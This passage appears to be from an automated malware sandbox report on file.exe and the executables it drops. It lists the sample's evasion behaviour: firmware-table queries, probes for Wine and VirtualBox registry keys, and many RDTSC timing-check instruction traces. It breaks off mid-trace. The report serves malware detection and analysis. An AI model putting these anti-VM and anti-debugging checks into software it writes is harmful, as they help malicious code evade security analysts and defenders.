Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76EB30 second address: 76EB47 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F988D0B0288h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007F988D0B0294h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9443FB second address: 944400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 944400 second address: 944408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9446A8 second address: 9446AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94914E second address: 94915B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F988D0B0286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94915B second address: 949169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 949169 second address: 94916F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DB7AC second address: 8DB7DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE329h 0x00000009 je 00007F988C7CE316h 0x0000000f popad 0x00000010 jmp 00007F988C7CE31Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DB7DC second address: 8DB80A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F988D0B0288h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F988D0B02ADh 0x00000012 jmp 00007F988D0B0299h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DB80A second address: 8DB810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94DFB4 second address: 94DFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94DFC5 second address: 94DFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94DFCB second address: 94DFCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94E683 second address: 94E687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94E687 second address: 94E68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94E68B second address: 94E696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953173 second address: 95318F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F988D0B0286h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F988D0B0286h 0x00000016 jc 00007F988D0B0286h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9532CF second address: 9532D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953468 second address: 95346C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95346C second address: 9534CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F988C7CE31Ah 0x0000000c jmp 00007F988C7CE325h 0x00000011 popad 0x00000012 pushad 0x00000013 push edi 0x00000014 jmp 00007F988C7CE31Dh 0x00000019 jmp 00007F988C7CE320h 0x0000001e pop edi 0x0000001f jmp 00007F988C7CE324h 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953B96 second address: 953BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0291h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953E5F second address: 953E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9540FD second address: 95413F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F988D0B0292h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jns 00007F988D0B0286h 0x00000012 jbe 00007F988D0B0286h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c jmp 00007F988D0B0296h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95413F second address: 954145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90599A second address: 9059A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9059A0 second address: 9059D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F988C7CE316h 0x0000000a jmp 00007F988C7CE325h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F988C7CE320h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95457A second address: 954580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 952E5A second address: 952E73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 952E73 second address: 952E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95FD03 second address: 95FD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95FD07 second address: 95FD0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95FD0B second address: 95FD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95EB5E second address: 95EB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 928EB0 second address: 928EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 928EB7 second address: 928EBC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9291DC second address: 9291E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9291E1 second address: 76EB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a xor dword ptr [ebp+12484F1Dh], esi 0x00000010 push dword ptr [ebp+122D15EDh] 0x00000016 call dword ptr [ebp+122D1E38h] 0x0000001c pushad 0x0000001d mov dword ptr [ebp+122D33D9h], eax 0x00000023 xor eax, eax 0x00000025 sub dword ptr [ebp+122D33D9h], edx 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f jne 00007F988D0B028Ch 0x00000035 mov dword ptr [ebp+122D3767h], eax 0x0000003b clc 0x0000003c mov esi, 0000003Ch 0x00000041 mov dword ptr [ebp+122D33D9h], edx 0x00000047 sub dword ptr [ebp+122D33D9h], eax 0x0000004d add esi, dword ptr [esp+24h] 0x00000051 add dword ptr [ebp+122D2B50h], edx 0x00000057 lodsw 0x00000059 sub dword ptr [ebp+122D2B50h], ecx 0x0000005f add eax, dword ptr [esp+24h] 0x00000063 sub dword ptr [ebp+122D2B50h], edi 0x00000069 mov ebx, dword ptr [esp+24h] 0x0000006d stc 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 push esi 0x00000072 jmp 00007F988D0B0296h 0x00000077 pop esi 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929350 second address: 92935D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92935D second address: 929361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9293D7 second address: 9293DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9293DB second address: 9293E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9293E1 second address: 9293F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988C7CE324h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929B40 second address: 929B74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007F988D0B028Ah 0x00000010 pop esi 0x00000011 nop 0x00000012 mov ecx, ebx 0x00000014 push 0000001Eh 0x00000016 mov cx, si 0x00000019 nop 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F988D0B028Ch 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929B74 second address: 929B9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F988C7CE316h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F988C7CE322h 0x0000001a push esi 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929CD4 second address: 929CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929CD8 second address: 929CDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929CDD second address: 929CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnc 00007F988D0B0286h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929E82 second address: 929E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F988C7CE31Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929E93 second address: 929EA8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jc 00007F988D0B0290h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95EFB4 second address: 95EFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95EFB8 second address: 95EFD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edi 0x0000000e jmp 00007F988D0B0292h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965013 second address: 96501C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96501C second address: 965020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965020 second address: 965024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965024 second address: 96502A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96502A second address: 965043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F988C7CE316h 0x0000000e jmp 00007F988C7CE31Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9655C3 second address: 9655FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F988D0B0286h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b ja 00007F988D0B0286h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 jbe 00007F988D0B0286h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F988D0B0291h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9655FC second address: 965600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965600 second address: 965635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F988D0B0298h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96598E second address: 965996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965B17 second address: 965B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965CA4 second address: 965CC9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F988C7CE329h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9691FA second address: 9691FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 968F2C second address: 968F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 968F30 second address: 968F36 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 968F36 second address: 968F3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B77B second address: 96B781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B336 second address: 96B33E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B33E second address: 96B343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B343 second address: 96B36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F988C7CE329h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007F988C7CE316h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B4CB second address: 96B4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F988D0B0286h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96CE17 second address: 96CE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 972335 second address: 97233F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F988D0B028Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9724A6 second address: 9724AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9724AB second address: 9724CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0292h 0x00000009 jmp 00007F988D0B028Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9724CF second address: 9724D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9724D3 second address: 9724E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F988D0B0286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F988D0B0292h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9727A1 second address: 9727CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE320h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F988C7CE328h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929904 second address: 9299A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F988D0B0294h 0x00000011 mov ch, al 0x00000013 mov ebx, dword ptr [ebp+1248DA46h] 0x00000019 jl 00007F988D0B0297h 0x0000001f call 00007F988D0B028Ah 0x00000024 jl 00007F988D0B0286h 0x0000002a pop ecx 0x0000002b add eax, ebx 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F988D0B0288h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 sub edx, dword ptr [ebp+122D381Bh] 0x0000004d nop 0x0000004e jmp 00007F988D0B0293h 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jp 00007F988D0B0290h 0x0000005c 